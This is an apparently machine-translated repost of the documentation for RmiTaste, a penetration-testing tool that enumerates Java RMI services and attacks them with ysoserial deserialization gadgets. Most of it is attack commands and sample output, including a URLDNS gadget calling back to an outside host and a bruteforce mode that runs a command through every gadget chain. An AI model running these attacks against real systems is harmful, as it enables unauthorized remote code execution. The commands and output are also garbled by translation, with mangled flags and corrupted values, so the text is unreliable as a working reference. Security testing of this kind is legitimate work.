Shulou(Shulou.com)05/31 Report--

Editor to share with you what kind of tool RmiTaste is, I believe most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

RmiTaste

RmiTaste can help security researchers detect, enumerate, interact, and attack RMI services by calling remote methods provided by the ysoserial utility. In addition, it allows us to call remote methods with specific parameters.

The main purpose of RmiTaste is to help security experts identify unsafe RMI services in the target system. Unauthorized access to the target computer system is an illegal act, and the use of RmiTaste must be carried out in legal scenarios.

Tools build and run

Note that OpenJDK v11.0.3 is required to run this tool.

First, we need to download ysoserial-master-SNAPSHOT.jar, and then store it in the libs_attack directory at the following download address:

Https://github.com/frohoff/ysoserial

Second, use maven to build the project code:

Mvn package

Next, run the following command:

Java-cp ".: libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste-h _. _\ _ | _ / _ / | _ _ | _ / _ _ |\ _ _ / _ /\ _ _\ / _ | |\ Y\ | | / _ | |\ _ | _ | / _ | _ | (_ / _ > | _ _ |\ _ _ >\ / @ author Marcin Ogorzelski (mzero-@ _ mzer0) STM Solutions Warning: RmiTaste was written to aid security professionals in identifying the insecure use of RMI services on systems which the user has prior permission to attack. RmiTaste must be used in accordance with all relevant laws. Failure to do so could lead to your prosecution. The developers assume no liability and are not responsible for any misuse or damage caused by this program. Tool use

RmiTaste provides four modes of operation, namely connection, enumeration, attack, and invocation. Each mode provides a separate help menu:

Java-cp ".: libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste-h (...) Usage: [- h] [COMMAND]-h,-- help displays this help message Commands: conn detects connections to hosts enum enumerates RMI services attack attacks RMI registration methods call calls specific methods of RMI remote objects conn connection mode

The conn connection mode allows us to determine whether the destination port is a RMI service port:

# Check if 127.0.0.1 cp 1099 is RMI Servicejava-cp ".: libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste conn-t 127.0.0.1-p 1099enum enumeration mode

The enum enumeration pattern allows researchers to obtain information about RMI services, such as remote object names and class names implemented and inherited by remote objects. If the interface implemented by the remote object is accessible in the RmiTaste classpath, RmiTaste will print out all the remote methods and allow us to call directly:

# RMI service enumerationjava-cp ".: libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum-t 127.0.0.1-p 1099attack attack mode

The attack attack mode allows remote methods to be called using a ysoserial-specific utility chain. Assume that the remote object has the following methods:

Acc1 [object] [127.0.1.1 virtual 38293] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] implements m0.rmitaste.example.server.ClientAccount [interface] setPin (java.lang.String param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] getBalance (); [method] deposit (java.lang.Object param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] withdraw (float param0) [method] # Call all remote methods with URLDNS gadget as parameterjava-cp ".: libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack-t 127.0.0.1-p 1099-g "URLDNS"-c "http://rce.mzero.pl"# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with URLDNS gadget as parameterjava-cp".: libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all. Jar "m0.rmitaste.RmiTaste attack-t 127.0.0.1-p 1099-m" acc1:m0.rmitaste.example.server.ClientAccount:deposit "- g" URLDNS "- c" http://rce.mzero.pl"

The "- gen bruteforce" option also allows us to implement brute force cracking of remote methods:

# Call acc1:m0.rmitaste.example.server.ClientAccount:deposit method with gadgets from ysoserial and command ping 127.0.0.1java-cp ".: libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste attack-t 127.0.0.1-p 1099-m "acc1:m0.rmitaste.example.server.ClientAccount:deposit"-gen bruteforce-c "ping 127.0.0.1" call call mode

The call invocation pattern allows us to call specific methods of the RMI remote object, assuming that the remote object has the following methods:

Acc1 [object] [127.0.1.1 virtual 38293] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] implements m0.rmitaste.example.server.ClientAccount [interface] setPin (java.lang.String param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] getBalance (); [method] deposit (java.lang.Object param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] withdraw (float param0) [method] # Call m0.rmitaste.example.server.ClientAccount.getBalance method on acc1 remote objectjava-cp ".: libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste call-t 127.0.0.1-p 1099-m "acc1:m0.rmitaste.example.server.ClientAccount:getBalance" # Call m0.rmitaste.example.server.ClientAccount.setPin ("1234") method on acc1 remote objectjava-cp ".: libs_attack/*:target/rmitaste- Sample usage of 1.0-SNAPSHOT-all.jar "m0.rmitaste.RmiTaste call-t 127.0.0.1-p 1099-m" acc1:m0.rmitaste.example.server.ClientAccount:setPin "- mp" string=1234 tool

Click [here] to get the sample server.

First, run the sample server.

Next, enumerate the objects:

Root@keyisinyourmind:/media/sf_pentest2/Tools/python/Toolset/Others/RmiTasteTool# java-cp ".: libs_attack/*:target/rmitaste-1.0-SNAPSHOT-all.jar" m0.rmitaste.RmiTaste enum-t 127.0.0.1-p 1099acc1 [object] [127.0.1.1 m0.rmitaste.RmiTaste enum 42881] extends java.rmi.server.RemoteObjectInvocationHandler [class] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] extends java.rmi. Server.RemoteObject [class] implements m0.rmitaste.example.server.ClientAccount [interface] No methods found. I don't have remote object interface. Give it to me! Acc2 [object] [127.0.1.1:42881] extends java.rmi.server.RemoteObjectInvocationHandler [class] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] extends java.rmi.server.RemoteObject [class] implements m0.rmitaste.example.server.ClientAccount [interface] No methods found. I don't have remote object interface. Give it to me!

As you can see, RmiTaste needs to use the interface of the remote object. In the penetration testing process, we also need to find these interfaces. In this example, we just need to copy the rmitaste.examples-1.0-SNAPSHOT-all.jar to the libs_attack directory for the lesson. Examples of enumerated objects are as follows:

Acc1 [object] [127.0.1.1 class] extends java.rmi.server.RemoteObjectInvocationHandler [class] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] extends java.rmi.server.RemoteObject [class] implements m0.rmitaste.example.server.ClientAccount [interface] setPin (java.lang.String param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] getBalance (); [method] deposit (java.lang.Object param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] withdraw (float param0); [method] acc2 [object] [127.0.1.1 float param0] extends java.rmi.server.RemoteObjectInvocationHandler [class] implements java.rmi.Remote [interface] extends java.lang.reflect.Proxy [class] extends java.rmi.server.RemoteObject [class] implements m0.rmitaste.example.server.ClientAccount [interface] setPin (java.lang.String param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] getBalance (); [method] deposit (java.lang.Object param0); [method] Parameters: param0; may be vulnerable to Java Deserialization! [info] withdraw (float param0); [method] these are all the contents of the article "what is RmiTaste?". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.